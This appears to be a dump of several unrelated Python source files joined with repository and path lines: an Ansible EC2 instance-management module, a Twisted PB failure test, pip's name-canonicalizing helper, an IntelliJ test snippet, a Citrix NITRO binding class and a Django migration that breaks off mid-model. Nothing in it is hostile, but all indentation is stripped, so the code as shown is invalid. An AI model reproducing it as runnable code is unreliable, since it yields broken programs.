bdm[volume['device_name']] = create_block_device(module, ec2, volume)
params['block_device_map'] = bdm
# check to see if we're using spot pricing first before starting instances
if not spot_price:
if assign_public_ip and private_ip:
params.update(
dict(
min_count=count_remaining,
max_count=count_remaining,
client_token=id,
placement_group=placement_group,
)
)
else:
params.update(
dict(
min_count=count_remaining,
max_count=count_remaining,
client_token=id,
placement_group=placement_group,
private_ip_address=private_ip,
)
)
# For ordinary (not spot) instances, we can select 'stop'
# (the default) or 'terminate' here.
params['instance_initiated_shutdown_behavior'] = instance_initiated_shutdown_behavior or 'stop'
try:
res = ec2.run_instances(**params)
except boto.exception.EC2ResponseError as e:
if (params['instance_initiated_shutdown_behavior'] != 'terminate' and
"InvalidParameterCombination" == e.error_code):
params['instance_initiated_shutdown_behavior'] = 'terminate'
res = ec2.run_instances(**params)
else:
raise
instids = [i.id for i in res.instances]
while True:
try:
ec2.get_all_instances(instids)
break
except boto.exception.EC2ResponseError as e:
if "<Code>InvalidInstanceID.NotFound</Code>" in str(e):
# there's a race between starting an instance and being able to describe it
continue
else:
module.fail_json(msg=str(e))
# The instances returned through ec2.run_instances above can be in
# terminated state due to idempotency. See commit 7f11c3d for a complete
# explanation.
terminated_instances = [
str(instance.id) for instance in res.instances if instance.state == 'terminated'
]
if terminated_instances:
module.fail_json(msg="Instances with id(s) %s " % terminated_instances +
"were created previously but have since been terminated - " +
"use a (possibly different) 'instanceid' parameter")
else:
if private_ip:
module.fail_json(
msg='private_ip only available with on-demand (non-spot) instances')
if boto_supports_param_in_spot_request(ec2, 'placement_group'):
params['placement_group'] = placement_group
elif placement_group:
module.fail_json(
msg="placement_group parameter requires Boto version 2.3.0 or higher.")
# You can't tell spot instances to 'stop'; they will always be
# 'terminate'd. For convenience, we'll ignore the latter value.
if instance_initiated_shutdown_behavior and instance_initiated_shutdown_behavior != 'terminate':
module.fail_json(
msg="instance_initiated_shutdown_behavior=stop is not supported for spot instances.")
if spot_launch_group and isinstance(spot_launch_group, string_types):
params['launch_group'] = spot_launch_group
params.update(dict(
count=count_remaining,
type=spot_type,
))
res = ec2.request_spot_instances(spot_price, **params)
# Now we have to do the intermediate waiting
if wait:
instids = await_spot_requests(module, ec2, res, count)
else:
instids = []
except boto.exception.BotoServerError as e:
module.fail_json(msg="Instance creation failed => %s: %s" % (e.error_code, e.error_message))
# wait here until the instances are up
num_running = 0
wait_timeout = time.time() + wait_timeout
res_list = ()
while wait_timeout > time.time() and num_running < len(instids):
try:
res_list = ec2.get_all_instances(instids)
except boto.exception.BotoServerError as e:
if e.error_code == 'InvalidInstanceID.NotFound':
time.sleep(1)
continue
else:
raise
num_running = 0
for res in res_list:
num_running += len([i for i in res.instances if i.state == 'running'])
if len(res_list) <= 0:
# got a bad response of some sort, possibly due to
# stale/cached data. Wait a second and then try again
time.sleep(1)
continue
if wait and num_running < len(instids):
time.sleep(5)
else:
break
if wait and wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg="wait for instances running timeout on %s" % time.asctime())
# We do this after the loop ends so that we end up with one list
for res in res_list:
running_instances.extend(res.instances)
# Enabled by default by AWS
if source_dest_check is False:
for inst in res.instances:
inst.modify_attribute('sourceDestCheck', False)
# Disabled by default by AWS
if termination_protection is True:
for inst in res.instances:
inst.modify_attribute('disableApiTermination', True)
# Leave this as late as possible to try and avoid InvalidInstanceID.NotFound
if instance_tags and instids:
try:
ec2.create_tags(instids, instance_tags)
except boto.exception.EC2ResponseError as e:
module.fail_json(msg="Instance tagging failed => %s: %s" % (e.error_code, e.error_message))
instance_dict_array = []
created_instance_ids = []
for inst in running_instances:
inst.update()
d = get_instance_info(inst)
created_instance_ids.append(inst.id)
instance_dict_array.append(d)
return (instance_dict_array, created_instance_ids, changed)
def terminate_instances(module, ec2, instance_ids):
"""
Terminates a list of instances
module: Ansible module object
ec2: authenticated ec2 connection object
instance_ids: a list of instance ids (strings) to terminate
Returns a tuple of (changed, instance_dict_array, terminated_instance_ids)
with information about the instances terminated.
If no instance needed to be terminated,
"changed" will remain False.
"""
# Whether to wait for termination to complete before returning
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
changed = False
instance_dict_array = []
if not isinstance(instance_ids, list) or len(instance_ids) < 1:
module.fail_json(msg='instance_ids should be a list of instances, aborting')
terminated_instance_ids = []
for res in ec2.get_all_instances(instance_ids):
for inst in res.instances:
if inst.state == 'running' or inst.state == 'stopped':
terminated_instance_ids.append(inst.id)
instance_dict_array.append(get_instance_info(inst))
try:
ec2.terminate_instances([inst.id])
except EC2ResponseError as e:
module.fail_json(msg='Unable to terminate instance {0}, error: {1}'.format(inst.id, e))
changed = True
# wait here until the instances are 'terminated'
if wait:
num_terminated = 0
wait_timeout = time.time() + wait_timeout
while wait_timeout > time.time() and num_terminated < len(terminated_instance_ids):
response = ec2.get_all_instances(instance_ids=terminated_instance_ids,
filters={'instance-state-name': 'terminated'})
try:
num_terminated = sum([len(res.instances) for res in response])
except Exception as e:
# got a bad response of some sort, possibly due to
# stale/cached data. Wait a second and then try again
time.sleep(1)
continue
if num_terminated < len(terminated_instance_ids):
time.sleep(5)
# waiting took too long
if wait_timeout < time.time() and num_terminated < len(terminated_instance_ids):
module.fail_json(msg="wait for instance termination timeout on %s" % time.asctime())
# Let's get the current state of the instances after terminating - issue600
instance_dict_array = []
for res in ec2.get_all_instances(instance_ids=terminated_instance_ids, filters={'instance-state-name': 'terminated'}):
for inst in res.instances:
instance_dict_array.append(get_instance_info(inst))
return (changed, instance_dict_array, terminated_instance_ids)
def startstop_instances(module, ec2, instance_ids, state, instance_tags):
"""
Starts or stops a list of existing instances
module: Ansible module object
ec2: authenticated ec2 connection object
instance_ids: The list of instance ids (strings) to start or stop
instance_tags: A dict of tag keys and values in the form of
{key: value, ... }
state: Intended state ("running" or "stopped")
Returns a tuple of (changed, instance_dict_array, instance_ids) with
information about the instances started/stopped.
If no instance was able to change state,
"changed" will be set to False.
Note that if instance_ids and instance_tags are both non-empty,
this method will process the intersection of the two
"""
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
source_dest_check = module.params.get('source_dest_check')
termination_protection = module.params.get('termination_protection')
group_id = module.params.get('group_id')
group_name = module.params.get('group')
changed = False
instance_dict_array = []
if not isinstance(instance_ids, list) or len(instance_ids) < 1:
# Fail unless the user defined instance tags
if not instance_tags:
module.fail_json(msg='instance_ids should be a list of instances, aborting')
# To make an EC2 tag filter, we need to prepend 'tag:' to each key.
# An empty filter does no filtering, so it's safe to pass it to the
# get_all_instances method even if the user did not specify instance_tags
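# For example (illustrative, not part of the original module):
#   instance_tags = {'env': 'prod', 'role': 'web'}
#   becomes filters = {'tag:env': 'prod', 'tag:role': 'web'}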
filters = {}
if instance_tags:
for key, value in instance_tags.items():
filters["tag:" + key] = value
if module.params.get('id'):
filters['client-token'] = module.params['id']
# Check that our instances are not already in the desired state
# Check (and, if needed, change) instance attributes and instance state
existing_instances_array = []
for res in ec2.get_all_instances(instance_ids, filters=filters):
for inst in res.instances:
# Check "source_dest_check" attribute
try:
if inst.vpc_id is not None and inst.get_attribute('sourceDestCheck')['sourceDestCheck'] != source_dest_check:
inst.modify_attribute('sourceDestCheck', source_dest_check)
changed = True
except boto.exception.EC2ResponseError as exc:
# instances with more than one Elastic Network Interface will
# fail, because they have the sourceDestCheck attribute defined
# per-interface
if exc.code == 'InvalidInstanceID':
for interface in inst.interfaces:
if interface.source_dest_check != source_dest_check:
ec2.modify_network_interface_attribute(interface.id, "sourceDestCheck", source_dest_check)
changed = True
else:
module.fail_json(msg='Failed to handle source_dest_check state for instance {0}, error: {1}'.format(inst.id, exc),
exception=traceback.format_exc())
# Check "termination_protection" attribute
if (inst.get_attribute('disableApiTermination')['disableApiTermination'] != termination_protection and termination_protection is not None):
inst.modify_attribute('disableApiTermination', termination_protection)
changed = True
# Check security groups, but only for EC2-VPC instances; EC2-Classic security groups cannot be modified
if inst.vpc_id and group_name:
grp_details = ec2.get_all_security_groups(filters={'vpc_id': inst.vpc_id})
if isinstance(group_name, string_types):
group_name = [group_name]
unmatched = set(group_name) - set(to_text(grp.name) for grp in grp_details)
if unmatched:
module.fail_json(msg="The following group names are not valid: %s" % ', '.join(unmatched))
group_ids = [to_text(grp.id) for grp in grp_details if to_text(grp.name) in group_name]
elif inst.vpc_id and group_id:
if isinstance(group_id, string_types):
group_id = [group_id]
grp_details = ec2.get_all_security_groups(group_ids=group_id)
group_ids = [grp_item.id for grp_item in grp_details]
if inst.vpc_id and (group_name or group_id):
if set(sg.id for sg in inst.groups) != set(group_ids):
changed = inst.modify_attribute('groupSet', group_ids)
# Check instance state
if inst.state != state:
instance_dict_array.append(get_instance_info(inst))
try:
if state == 'running':
inst.start()
else:
inst.stop()
except EC2ResponseError as e:
module.fail_json(msg='Unable to change state for instance {0}, error: {1}'.format(inst.id, e))
changed = True
existing_instances_array.append(inst.id)
instance_ids = list(set(existing_instances_array + (instance_ids or [])))
# Wait for all the instances to finish starting or stopping
wait_timeout = time.time() + wait_timeout
while wait and wait_timeout > time.time():
instance_dict_array = []
matched_instances = []
for res in ec2.get_all_instances(instance_ids):
for i in res.instances:
if i.state == state:
instance_dict_array.append(get_instance_info(i))
matched_instances.append(i)
if len(matched_instances) < len(instance_ids):
time.sleep(5)
else:
break
if wait and wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg="wait for instances running timeout on %s" % time.asctime())
return (changed, instance_dict_array, instance_ids)
def restart_instances(module, ec2, instance_ids, state, instance_tags):
"""
Restarts a list of existing instances
module: Ansible module object
ec2: authenticated ec2 connection object
instance_ids: The list of instance ids (strings) to restart
instance_tags: A dict of tag keys and values in the form of
{key: value, ... }
state: Intended state ("restarted")
Returns a tuple of (changed, instance_dict_array, instance_ids) with
information about the instances.
If no instance was able to change state,
"changed" will be set to False.
Wait does not apply here, as a reboot is an OS-level operation.
Note that if instance_ids and instance_tags are both non-empty,
this method will process the intersection of the two.
"""
source_dest_check = module.params.get('source_dest_check')
termination_protection = module.params.get('termination_protection')
changed = False
instance_dict_array = []
if not isinstance(instance_ids, list) or len(instance_ids) < 1:
# Fail unless the user defined instance tags
if not instance_tags:
module.fail_json(msg='instance_ids should be a list of instances, aborting')
# To make an EC2 tag filter, we need to prepend 'tag:' to each key.
# An empty filter does no filtering, so it's safe to pass it to the
# get_all_instances method even if the user did not specify instance_tags
filters = {}
if instance_tags:
for key, value in instance_tags.items():
filters["tag:" + key] = value
if module.params.get('id'):
filters['client-token'] = module.params['id']
# Check that our instances are not already in the desired state
# Check (and, if needed, change) instance attributes and instance state
for res in ec2.get_all_instances(instance_ids, filters=filters):
for inst in res.instances:
# Check "source_dest_check" attribute
try:
if inst.vpc_id is not None and inst.get_attribute('sourceDestCheck')['sourceDestCheck'] != source_dest_check:
inst.modify_attribute('sourceDestCheck', source_dest_check)
changed = True
except boto.exception.EC2ResponseError as exc:
# instances with more than one Elastic Network Interface will
# fail, because they have the sourceDestCheck attribute defined
# per-interface
if exc.code == 'InvalidInstanceID':
for interface in inst.interfaces:
if interface.source_dest_check != source_dest_check:
ec2.modify_network_interface_attribute(interface.id, "sourceDestCheck", source_dest_check)
changed = True
else:
module.fail_json(msg='Failed to handle source_dest_check state for instance {0}, error: {1}'.format(inst.id, exc),
exception=traceback.format_exc())
# Check "termination_protection" attribute
if (inst.get_attribute('disableApiTermination')['disableApiTermination'] != termination_protection and termination_protection is not None):
inst.modify_attribute('disableApiTermination', termination_protection)
changed = True
# Check instance state
if inst.state != state:
instance_dict_array.append(get_instance_info(inst))
try:
inst.reboot()
except EC2ResponseError as e:
module.fail_json(msg='Unable to change state for instance {0}, error: {1}'.format(inst.id, e))
changed = True
return (changed, instance_dict_array, instance_ids)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
key_name=dict(aliases=['keypair']),
id=dict(),
group=dict(type='list', aliases=['groups']),
group_id=dict(type='list'),
zone=dict(aliases=['aws_zone', 'ec2_zone']),
instance_type=dict(aliases=['type']),
spot_price=dict(),
spot_type=dict(default='one-time', choices=["one-time", "persistent"]),
spot_launch_group=dict(),
image=dict(),
kernel=dict(),
count=dict(type='int', default='1'),
monitoring=dict(type='bool', default=False),
ramdisk=dict(),
wait=dict(type='bool', default=False),
wait_timeout=dict(default=300),
spot_wait_timeout=dict(default=600),
placement_group=dict(),
user_data=dict(),
instance_tags=dict(type='dict'),
vpc_subnet_id=dict(),
assign_public_ip=dict(type='bool', default=False),
private_ip=dict(),
instance_profile_name=dict(),
instance_ids=dict(type='list', aliases=['instance_id']),
source_dest_check=dict(type='bool', default=True),
termination_protection=dict(type='bool', default=None),
state=dict(default='present', choices=['present', 'absent', 'running', 'restarted', 'stopped']),
instance_initiated_shutdown_behavior=dict(default=None, choices=['stop', 'terminate']),
exact_count=dict(type='int', default=None),
count_tag=dict(),
volumes=dict(type='list'),
ebs_optimized=dict(type='bool', default=False),
tenancy=dict(default='default'),
network_interfaces=dict(type='list', aliases=['network_interface'])
)
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive=[
['group_name', 'group_id'],
['exact_count', 'count'],
['exact_count', 'state'],
['exact_count', 'instance_ids'],
['network_interfaces', 'assign_public_ip'],
['network_interfaces', 'group'],
['network_interfaces', 'group_id'],
['network_interfaces', 'private_ip'],
['network_interfaces', 'vpc_subnet_id'],
],
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
if module.params.get('region') or not module.params.get('ec2_url'):
ec2 = ec2_connect(module)
elif module.params.get('ec2_url'):
ec2 = connect_ec2_endpoint(ec2_url, **aws_connect_kwargs)
if 'region' not in aws_connect_kwargs:
aws_connect_kwargs['region'] = ec2.region
vpc = connect_vpc(**aws_connect_kwargs)
except boto.exception.NoAuthHandlerFound as e:
module.fail_json(msg="Failed to get connection: %s" % e.message, exception=traceback.format_exc())
tagged_instances = []
state = module.params['state']
if state == 'absent':
instance_ids = module.params['instance_ids']
if not instance_ids:
module.fail_json(msg='instance_ids list is required for absent state')
(changed, instance_dict_array, new_instance_ids) = terminate_instances(module, ec2, instance_ids)
elif state in ('running', 'stopped'):
instance_ids = module.params.get('instance_ids')
instance_tags = module.params.get('instance_tags')
if not (isinstance(instance_ids, list) or isinstance(instance_tags, dict)):
module.fail_json(msg='running list needs to be a list of instances or set of tags to run: %s' % instance_ids)
(changed, instance_dict_array, new_instance_ids) = startstop_instances(module, ec2, instance_ids, state, instance_tags)
elif state == 'restarted':
instance_ids = module.params.get('instance_ids')
instance_tags = module.params.get('instance_tags')
if not (isinstance(instance_ids, list) or isinstance(instance_tags, dict)):
module.fail_json(msg='running list needs to be a list of instances or set of tags to run: %s' % instance_ids)
(changed, instance_dict_array, new_instance_ids) = restart_instances(module, ec2, instance_ids, state, instance_tags)
elif state == 'present':
# Changed is always set to true when provisioning new instances
if not module.params.get('image'):
module.fail_json(msg='image parameter is required for new instance')
if module.params.get('exact_count') is None:
(instance_dict_array, new_instance_ids, changed) = create_instances(module, ec2, vpc)
else:
(tagged_instances, instance_dict_array, new_instance_ids, changed) = enforce_count(module, ec2, vpc)
module.exit_json(changed=changed, instance_ids=new_instance_ids, instances=instance_dict_array, tagged_instances=tagged_instances)
if __name__ == '__main__':
main()
|
exelearning/iteexe
|
refs/heads/master
|
twisted/test/test_pbfailure.py
|
16
|
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.trial import unittest
from twisted.spread import pb, flavors, jelly
from twisted.internet import reactor, defer
from twisted.python import log, failure
##
# test exceptions
##
class PoopError(Exception): pass
class FailError(Exception): pass
class DieError(Exception): pass
class TimeoutError(Exception): pass
#class JellyError(flavors.Jellyable, pb.Error): pass
class JellyError(flavors.Jellyable, pb.Error, pb.RemoteCopy): pass
class SecurityError(pb.Error, pb.RemoteCopy): pass
pb.setUnjellyableForClass(JellyError, JellyError)
pb.setUnjellyableForClass(SecurityError, SecurityError)
pb.globalSecurity.allowInstancesOf(SecurityError)
####
# server-side
####
class SimpleRoot(pb.Root):
def remote_poop(self):
return defer.fail(failure.Failure(PoopError("Someone threw poopie at me!")))
def remote_fail(self):
raise FailError("I'm a complete failure! :(")
def remote_die(self):
raise DieError("*gack*")
def remote_jelly(self):
self.raiseJelly()
def remote_security(self):
self.raiseSecurity()
def remote_deferredJelly(self):
d = defer.Deferred()
d.addCallback(self.raiseJelly)
d.callback(None)
return d
def remote_deferredSecurity(self):
d = defer.Deferred()
d.addCallback(self.raiseSecurity)
d.callback(None)
return d
def raiseJelly(self, results=None):
raise JellyError("I'm jellyable!")
def raiseSecurity(self, results=None):
raise SecurityError("I'm secure!")
class PBConnTestCase(unittest.TestCase):
unsafeTracebacks = 0
def setUp(self):
self._setUpServer()
self._setUpClient()
def _setUpServer(self):
self.serverFactory = pb.PBServerFactory(SimpleRoot())
self.serverFactory.unsafeTracebacks = self.unsafeTracebacks
self.serverPort = reactor.listenTCP(0, self.serverFactory, interface="127.0.0.1")
def _setUpClient(self):
portNo = self.serverPort.getHost().port
self.clientFactory = pb.PBClientFactory()
self.clientConnector = reactor.connectTCP("127.0.0.1", portNo, self.clientFactory)
def tearDown(self):
return defer.gatherResults([
self._tearDownServer(),
self._tearDownClient()])
def _tearDownServer(self):
return defer.maybeDeferred(self.serverPort.stopListening)
def _tearDownClient(self):
self.clientConnector.disconnect()
return defer.succeed(None)
class PBFailureTest(PBConnTestCase):
compare = unittest.TestCase.assertEquals
def testPBFailures(self):
d = self.clientFactory.getRootObject()
d.addCallback(self.connected)
d.addCallback(self.cleanupLoggedErrors)
return d
def testCopiedFailureLogging(self):
d = self.clientFactory.getRootObject()
def connected(rootObj):
return rootObj.callRemote('die')
d.addCallback(connected)
def exception(failure):
log.err(failure)
errs = log.flushErrors(DieError)
self.assertEquals(len(errs), 2)
d.addErrback(exception)
return d
def addFailingCallbacks(self, remoteCall, expectedResult, eb):
remoteCall.addCallbacks(self.success, eb,
callbackArgs=(expectedResult,))
return remoteCall
##
# callbacks
##
def cleanupLoggedErrors(self, ignored):
errors = log.flushErrors(PoopError, FailError, DieError,
AttributeError, JellyError, SecurityError)
self.assertEquals(len(errors), 6)
return ignored
def connected(self, persp):
methods = (('poop', 42, self.failurePoop),
('fail', 420, self.failureFail),
('die', 4200, self.failureDie),
('nosuch', 42000, self.failureNoSuch),
('jelly', 43, self.failureJelly),
('security', 430, self.failureSecurity),
('deferredJelly', 4300, self.failureDeferredJelly),
('deferredSecurity', 43000, self.failureDeferredSecurity))
return defer.gatherResults([
self.addFailingCallbacks(persp.callRemote(meth), result, eb)
for (meth, result, eb) in methods])
def success(self, result, expectedResult):
self.assertEquals(result, expectedResult)
return result
def failurePoop(self, fail):
fail.trap(PoopError)
self.compare(fail.traceback, "Traceback unavailable\n")
return 42
def failureFail(self, fail):
fail.trap(FailError)
self.compare(fail.traceback, "Traceback unavailable\n")
return 420
def failureDie(self, fail):
fail.trap(DieError)
self.compare(fail.traceback, "Traceback unavailable\n")
return 4200
def failureNoSuch(self, fail):
fail.trap(pb.NoSuchMethod)
self.compare(fail.traceback, "Traceback unavailable\n")
return 42000
def failureJelly(self, fail):
fail.trap(JellyError)
self.failIf(isinstance(fail.type, str))
self.failUnless(isinstance(fail.value, fail.type))
return 43
def failureSecurity(self, fail):
fail.trap(SecurityError)
self.failIf(isinstance(fail.type, str))
self.failUnless(isinstance(fail.value, fail.type))
return 430
def failureDeferredJelly(self, fail):
fail.trap(JellyError)
self.failIf(isinstance(fail.type, str))
self.failUnless(isinstance(fail.value, fail.type))
return 4300
def failureDeferredSecurity(self, fail):
fail.trap(SecurityError)
self.failIf(isinstance(fail.type, str))
self.failUnless(isinstance(fail.value, fail.type))
return 43000
class PBFailureTestUnsafe(PBFailureTest):
compare = unittest.TestCase.failIfEquals
unsafeTracebacks = 1
|
oswalpalash/remoteusermgmt
|
refs/heads/master
|
RUM/lib/python2.7/site-packages/pip/_vendor/packaging/utils.py
|
1126
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import re
_canonicalize_regex = re.compile(r"[-_.]+")
def canonicalize_name(name):
# This is taken from PEP 503.
return _canonicalize_regex.sub("-", name).lower()
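# Illustrative examples (not part of the original module): runs of '-', '_'
# and '.' collapse to a single '-', and the result is lowercased, e.g.
#   canonicalize_name("Django_REST--framework") == "django-rest-framework"
#   canonicalize_name("zope.interface") == "zope-interface"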
|
alphafoobar/intellij-community
|
refs/heads/master
|
python/testData/codeInsight/controlflow/assertfalseargument.py
|
83
|
assert False, 'foo'
print('unreachable 1')
assert False, f()
print('unreachable 2')
|
mahabs/nitro
|
refs/heads/master
|
nssrc/com/citrix/netscaler/nitro/resource/config/appflow/appflowpolicylabel_binding.py
|
1
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class appflowpolicylabel_binding(base_resource):
""" Binding class showing the resources that can be bound to appflowpolicylabel_binding.
"""
def __init__(self) :
self._labelname = ""
self.appflowpolicylabel_appflowpolicy_binding = []
@property
def labelname(self) :
"""Name of the policy label about which to display detailed information.<br/>Minimum length = 1.
"""
try :
return self._labelname
except Exception as e:
raise e
@labelname.setter
def labelname(self, labelname) :
"""Name of the policy label about which to display detailed information.<br/>Minimum length = 1
"""
try :
self._labelname = labelname
except Exception as e:
raise e
@property
def appflowpolicylabel_appflowpolicy_bindings(self) :
"""appflowpolicy that can be bound to appflowpolicylabel.
"""
try :
return self._appflowpolicylabel_appflowpolicy_binding
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(appflowpolicylabel_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.appflowpolicylabel_binding
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.labelname) :
return str(self.labelname)
return None
except Exception as e :
raise e
@classmethod
def get(self, service, labelname) :
""" Use this API to fetch appflowpolicylabel_binding resource.
"""
try :
if type(labelname) is not list :
obj = appflowpolicylabel_binding()
obj.labelname = labelname
response = obj.get_resource(service)
else :
if labelname and len(labelname) > 0 :
obj = [appflowpolicylabel_binding() for _ in range(len(labelname))]
# initialise the response list before filling it per label
response = [None] * len(labelname)
for i in range(len(labelname)) :
obj[i].labelname = labelname[i]
response[i] = obj[i].get_resource(service)
return response
except Exception as e:
raise e
class appflowpolicylabel_binding_response(base_response) :
def __init__(self, length=1) :
self.appflowpolicylabel_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.appflowpolicylabel_binding = [appflowpolicylabel_binding() for _ in range(length)]
|
inspyration/django-gluon
|
refs/heads/master
|
gluon/util/migrations/0001_initial.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
import base.fields
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Browser',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be seen from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_browser_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_browser_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_browser_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'Browser',
'verbose_name_plural': 'Browsers',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Country',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be seen from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('alpha2', models.CharField(unique=True, verbose_name='alpha2', max_length=2, help_text='Two letters code')),
('alpha3', models.CharField(unique=True, verbose_name='alpha3', max_length=3, help_text='Three letters code')),
('number', models.PositiveSmallIntegerField(unique=True, verbose_name='number', help_text='Three digits number code')),
('name_fr', models.CharField(unique=True, verbose_name='french name', max_length=2, help_text='French common name of the country')),
('name_en', models.CharField(unique=True, verbose_name='english name', max_length=3, help_text='English common name of the country')),
('usage', models.CharField(unique=True, verbose_name='usage name', max_length=3, help_text='Usage name (localised)')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_country_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_country_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_country_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'country',
'verbose_name_plural': 'countries',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='HtmlTag',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be seen from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_htmltag_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_htmltag_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_htmltag_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'Html tag',
'verbose_name_plural': 'Html tags',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='HttpResource',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be seen from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('path', models.CharField(verbose_name='path', blank=True, max_length=127, help_text='Path to the (hosted) resource')),
('browser', models.ForeignKey(verbose_name='browser', related_name='browser_httpresource_set', to='util.Browser', help_text='Specific Browser (potentially with version number)')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_httpresource_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
